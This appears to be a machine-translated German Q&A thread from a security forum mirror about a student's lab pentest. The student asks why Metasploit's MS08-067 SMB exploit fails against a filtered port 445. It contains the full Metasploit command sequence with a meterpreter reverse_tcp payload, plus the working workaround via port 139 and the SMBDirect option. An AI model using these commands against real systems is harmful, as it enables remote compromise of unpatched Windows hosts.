it-swarm.com.de

Ausnutzung durch einen gefilterten Port

Ich mache ein Pentesting gegen eine Maschine, die der Dozent im Labor aufgestellt hat. NMAP zeigt an, dass Port 445 gefiltert werden soll, und Nessus bestätigt, dass auf diesem Computer die Sicherheitsanfälligkeit ms08_067 vorliegt.

Ich habe versucht, Metasploit auf normale Weise dagegen auszuführen:

use exlpoit/windows/smb/ms08_067_netapi
set RHOST TARGET_IP
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST MY_IP
exploit

Es sagt mir:

[-] Exploit fehlgeschlagen [nicht erreichbar]: Rex :: ConnectionRefused Die Verbindung wurde vom Remote-Host abgelehnt (192.168.2.2:445).

Ich vermute, der Exploit schlägt fehl, weil Port 445 gefiltert ist. Was mich verwirrt hat, ist, dass Nessus anscheinend überprüfen kann, ob die Sicherheitsanfälligkeit vorliegt. Da Nessus dies über den gefilterten Port tun kann, gibt es eine Möglichkeit, den Exploit über einen gefilterten Port zu starten? Gibt es Metasploit-Einstellungen, die angeordnet werden müssen?

7
Juicy

Sie haben widersprüchliche Informationen: nmap sagt, dass der Port gefiltert ist, aber nessus sagt, dass die Sicherheitsanfälligkeit auf dem System vorhanden ist. Sie können nicht beide wahr sein, eine davon muss falsch sein. Angesichts der Tatsache, dass Metasploit keine Verbindung herstellen kann, ist es wahrscheinlich, dass Nessus falsch meldet oder den Schwachstellenbericht auf Informationen basiert, die von anderen offenen Ports abgerufen wurden. Wenn Sie sich Seite von Tenable in diesem Hinweis ansehen, werden Sie sehen, dass Nessus mit Port 139 oder Port 445 darauf testen kann, sodass 139 wahrscheinlich geöffnet ist und möglicherweise ausgenutzt werden kann.

9
GdD

Selbst wenn der Port 445 (SMB) geschlossen ist, können Sie diese Sicherheitsanfälligkeit manchmal über Port 139 (NetBios) ausnutzen. Verwenden Sie in Metasploit einfach die folgende Syntax:

set RPORT 139; set SMBDirect false; exploit
3
Ricardo Reimao

tl; dr Nein, Sie können diese Sicherheitsanfälligkeit nicht direkt über einen gefilterten Port ausnutzen und sie kann auf diese Weise nicht erkannt werden. In Ihrem Szenario muss noch etwas anderes los sein.

Warum?

Wenn dieser Port gefiltert zurückkommt, verwirft eine Firewall oder IPS) Pakete, was bedeutet, dass Sie keine Antwort vom Server erhalten. Dieser Fehler (MS08-067) kann nur erkannt werden von Nessus, wenn der Schwachstellenscanner eine SMB -Verbindung zu diesem Port herstellen kann. Nessus versucht nicht automatisch, die Firewall in irgendeiner Weise zu umgehen, aber es Möglicherweise wird eine andere Art von Port-Scan durchgeführt, die zu unterschiedlichen Ergebnissen führen kann.

Mögliche Gründe für die Ergebnisse, die Sie sehen :

  • Nessus erkennt möglicherweise die Sicherheitsanfälligkeit an einem anderen Port, wahrscheinlich NetBIOS über TCP (NBT) unter TCP/139. Überprüfen Sie den Nessus-Bericht sorgfältig. In diesem Fall müssten Sie set RPORT 139 und auch set SMBDirect false. Letzteres ist eine erweiterte Option (show advanced).

  • Zwischen Ihnen und dem Zielhost (oder auf dem Zielhost) wird eine Art Intrusion Prevention ausgeführt, die zu inkonsistenten Port-Scan-Ergebnissen führt. Versuchen Sie, NMAP in verschiedenen Konfigurationen auszuführen (-sS, -sT, -p445,139 etc) um zu sehen, ob die Ergebnisse konsistent sind. Dies erklärt nicht wirklich, warum Nessus es erkennen könnte, aber es kann von Metasploit nicht ausgenutzt werden. Es scheint auch in einer Laborumgebung unwahrscheinlich, es sei denn, das Labor wurde speziell für IPS Ausweichen) eingerichtet.

3
itscooper

"Gefiltert" bedeutet normalerweise, dass keine Antwort vom Port empfangen wurde (im Gegensatz zu "geschlossen", das mit einem RST-Paket antwortet - siehe Port-Scanner auf Wikipedia ). Dies weist normalerweise darauf hin, dass die Firewall nur die Pakete verwirft, die an diesen Port gesendet werden, und es ist unwahrscheinlich, dass sie ausgenutzt werden können.

2
valentinas

Möglicherweise können Sie die BNAT-Suite-Technik (ebenfalls in Metasploit enthalten) oder die Nmap NSE-Firewall-Bypass-Technik) verwenden, um die Firewall oder den IP-Filtermechanismus zu durchlaufen.

1
atdre

Ich habe das gleiche Problem. Mein nmap-Scan auf dem smb-vuln-ms08-067 mit den Ports 139 und 445 zeigt, dass das gescannte System anfällig war, aber der Exploit nicht funktioniert hat.

set RPORT 139

und

set SMBDirect false

arbeitete für mich (Dank Ricardo Reimao wollte ich einen Kommentar abgeben, aber es hat nicht funktioniert)

Ich habe zuvor versucht, den Port auf 139 zu setzen, wusste aber nichts über die SMBDirect-Option.

Ich habe mich gefragt, warum msf mir die Option beim Eingeben von "show options" nicht angezeigt hat und herausgefunden hat, dass Sie mit dem Befehl "show advanced" weitere Optionen anzeigen können.

msf exploit(windows/smb/ms08_067_netapi) > show advanced

Module advanced options (exploit/windows/smb/ms08_067_netapi):

   Name                    Current Setting    Required  Description
   ----                    ---------------    --------  -----------
   ...
   SMBDirect               false              no        The target port is a raw SMB service (not NetBIOS)
   ...
0
Towky